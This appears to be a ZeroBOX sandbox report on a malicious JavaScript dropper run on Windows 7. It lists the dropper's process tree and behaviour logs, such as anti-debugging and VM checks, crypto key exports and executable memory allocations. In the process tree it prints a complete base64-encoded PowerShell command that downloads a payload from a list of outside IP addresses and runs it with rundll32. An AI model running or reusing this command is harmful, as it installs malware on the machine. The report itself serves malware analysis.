Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 25, 2023, 11:04 a.m.	May 25, 2023, 11:06 a.m.

Size	271.8KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`c2951dc43814c87f30815f802c3d27e7`
SHA256	`5229be90fc46eae59333011c090ca6f827bd22ab2d8c50436d2f6ec8ad620608`
CRC32	`1B936027`
ssdeep	`3072:Bq2mUAF5EOGc+ZrU+uzQJtlzRTU8TSsqZ0rWOva8aquR1aUfD4TJ:BpVAF7GXHugLtTNK07N8pL4N`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\GuessableInapti.js
3044
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\stalerImmigrator.js" KickoffMaldocchio Aggregates
  1228
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="
    240

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 25, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 25, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 11:05 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 25, 2023, 11:05 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6b28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c5f68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c5f68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c5f68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 11:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c6028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 25, 2023, 11:05 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 141 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 1228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x742d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02603000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02604000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02677000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02605000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02606000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 11:05 a.m.	process_identifier: 240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
